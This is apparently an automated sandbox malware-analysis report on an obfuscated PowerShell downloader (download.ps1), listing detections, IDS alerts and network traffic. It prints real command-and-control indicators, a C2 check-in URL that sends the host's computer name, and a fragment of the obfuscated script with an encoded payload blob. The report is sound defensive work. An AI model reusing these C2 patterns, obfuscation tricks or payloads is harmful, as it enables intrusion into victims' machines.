Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1586614
MD5:c1b62618e0e00d6a5aea3dfd2e52ccac
SHA1:7a3342c0c395ce755b2f8061fe32fc9dc2e3df6c
SHA256:6a9d1fddcea756db4858890143b4b9e01616c566cfcc5987a062ce799122925d
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2640, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2640, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T12:27:06.311533+010020577411A Network Trojan was detected192.168.2.54970445.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T12:27:06.311533+010018100002Potentially Bad Traffic192.168.2.54970445.61.136.13880TCP
2025-01-09T12:27:06.984569+010018100002Potentially Bad Traffic192.168.2.549705142.250.185.19680TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 13%Perma Link
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2160518841.0000024FF2832000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll source: powershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdll source: powershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2162963496.0000024FF482D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb0; source: powershell.exe, 00000000.00000002.2165780693.0000024FF4CD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2160518841.0000024FF2832000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbO source: powershell.exe, 00000000.00000002.2162963496.0000024FF487E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2164653770.0000024FF4B79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2165780693.0000024FF4CD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2162963496.0000024FF487E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2162963496.0000024FF482D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdb source: powershell.exe, 00000000.00000002.2164653770.0000024FF4B79000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.5:49704 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 142.250.185.196:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jejmbadfmeenlnk.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: jejmbadfmeenlnk.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: jejmbadfmeenlnk.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$uvi20ktjcnyw35a/$s15icx0rbfpgmo7.php?id=$env:computername&key=$evzistfw&s=527
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2164509679.0000024FF4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros_)M
Source: powershell.exe, 00000000.00000002.2124041725.0000024F81951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jejmbadfmeenlnk.top
Source: powershell.exe, 00000000.00000002.2124041725.0000024F81891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8254B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F826CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2124041725.0000024F81951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coZ
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2155062733.0000024F90001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8196D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2155062733.0000024F90001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8196D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2124041725.0000024F81A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2124041725.0000024F826CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2025/president-jimmy-carter-6753651837110135.2-2x.png
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2025/president-jimmy-carter-6753651837110135.2-2x.pngX
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D981D60_2_00007FF848D981D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D98F820_2_00007FF848D98F82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D911450_2_00007FF848D91145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D8CD210_2_00007FF848D8CD21
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmspxqip.05b.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $r2m0v4yszou5q8i.(([system.String]::new(@((1078-1011),(285048/(9897072/(31171152/(61614384/7618)))),(243712/2176),(6478-(7466-(2306720/2080))),(-3898+3982),(8147-(6956+(5929200/5490)))))))( $okpsq3j7xua9ev6 ) $r2m0v4yszou5q8i.(([system.String]::new(@((7473-(64965432/(2630+(15348858/2499)))),(-1335+(-5022+(2505+3960))),(-7500+7611),(-1526+1641),(396021/(5107-(10735-(25600869/(25745643/9603)))))))))()$ryimh4s3g71pe0b.(([system.String]::new(@((-9570+9637),(4750-4642),(7743-(26887536/(27017887/7669))),(8632-8517),(-10062+(9191+(3752892/3861)))))))()[byte[]] $v306h4sxu87mkli = $okpsq3j7xua9ev6.(([char[]]@((-314+(4067-(-4380+(-1666+9715)))),(324453/(-2071+(9241-(14341-(10070+(924-(2837700/3153))))))),(-1198+1263),(-9615+9729),(97470/855),(75854/(2645-1863)),(-9690+(75603566/(5866+1840)))) -join ''))() $f5i0puwm4rqtoel=$v306h4sxu87mkli return $f5i0puwm4rqtoel}[System.Text.Encoding]::ascii.(([system.String]::new(@((8052-7981),(2092-(-8159+(7948+(9611-7409)))),(652732/5627),(379642/(12892-8318)),(348928/(13008-(12167-2167))),(-3214+(-5993+9321)),(17640/168),(7131-7021),(375-(1214208/(946368/212)))))))((vguqo6wa9yskcme0nrhl8d52z1i "cPp4enYzMGEwY+/3BP5tvQe1D+a0nbHt38C/HESvjj5wc3sMqIhkYf4MNOAUZzkGRl8fMZktuvVQnoVQAATvr+QnH9NQKKaCVkJNpyPclcvS6Ekzt65XpUuITBHCj9kLIG4vBglNz4XIrouvOPb7sWE8Hz4ora1wgewsJ+gMzZf90ImXkE1P1onGwm6jrC3SVe0vh4NDRhlBHggbkIdllJjkF/YjTASXEK6fKflKe5TAPIUHHL9fAZlY/goYSu+G6MCHyIacorKGTEOVqtYgNYOI3CI/OFjtUPaUpmxxv5t6TQe16CsyMRvo94nNw123sbaSYcnG0bUagw9lrg+eAdjPUcwZFuQ8HYQbt8u+/6RsAa6azvZqIKpJGb/ihTHmw7wXveF5+Co80qpbuaUrJY5K016+iK7xuhntw8X95P3ifBAz3P6NjoLci15pPY+rtrK3kSktDFhLG6qR24qKm5WAmw56nR2bnJiZl3vQ60QZQuWgSmuvJIGNxrvivQFzNGctJK4a67UuSBmYXobKlDX7vWSzjaqguxu5vxsGiLLF/8+W34eS+BtR2P1yDlPCFN+lLSng7JbqEb83YT87svuYhUyPuZ4gdUqcEMR4xN1ghJ7jWsL8JnXMfNCFi5A+j+vs4iunK8SBtZJT1miL1dlMiF+oXM2XuLKlv/3cjpjeyGWLwKjpZz3C/jT6sKc0JYbr9b+FlObmG4j4PPr5CbgOiVSGepHc1XoOkwp428md0FXdtljGuAyQRyV+yG4N2/L/02SSXMgxPfmwRokQ22FRZdlSrDS7XU8uB3n+XcQgBEW87Gd7g5ChV0auQIbluy1T4SuGtb1dZZv2zSpIdguGSF/qMByo0rP6ip8G6qYgGet0SnSmuoPHgzONMVsaX9yAslsY6Jnf6Em7wF5+dWncf29jzLwjEIuStEnORC3WvgiS2Ky52cVU54YLjAxWVo6Ovf3Y88LjqI+xEa57q+RJ2GWDjNUoKZJmS18B3owqP+/zUszHgY+Om4zDXeeG57I2UsekVAQXKS6213N/N9AVnQoX3QEYwnW3yVJdg+4amVfWzVEtwmZIWUCr6xCztom0fNrITax+ZeUfODen5v5EDvDssybwJG1aXU1c0vI/Godwci5d3vml1io7Sh5m/qKBrQ3831z/hmzAEfjp9iinoMBQxiqhEVRwQ1xNLCNcTgCAQhYtlFWIUwbEvd/OmfbXftgJi9fRYZ7B6x+H887tQjKOvMxAkEqJi4bDyaTfJBWbmHe1hYXPUofkjbF8o7h01a6a9ZcPhCLfCji8RlxU1KC7KVKqXeDyz3MD/sFDjlttSFyIKDTixyEkwv6b4lkBB/ReMTjuhcGNz8FXC5PhqzpIM8KfrJ3y5ObuFLU1Bq3aYQGojU9wL2goLdK5+n24WQEy0cSz+59P0eFhWflwwiV2cv1sb02koAzlnVx7aIBUAEk3WKCG9DtLeHqbcbgD+E9D9jxlb434W+e6iYJ9NBK7MX6Rb+1VLSE/2BtYuVej5jfVuDzzt8QTXJPknHSvRwl/6XCLU1D8bqebw73zUPdYe7yfQlM8gS8W0PfuEGjLbeoGlFRDuK9Hfa96fDJV2xTAhnljK2EUGoQtEoO8sw4bWlj7fb5q+9H5+c6kGQYi/y6yeOPUKV6heHHuOvqbRPWDlDzE1ZxgFGD7Z5IWALIup8SWc26T0xru+tIidgblL4FU1wFwH4XwNXH2wYf1X2/Pp2da9cOR8hUqAR3pE3yPNAr7YU05evZ8iVc6ZspzdLwZ374yczSkZ5J3zMn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
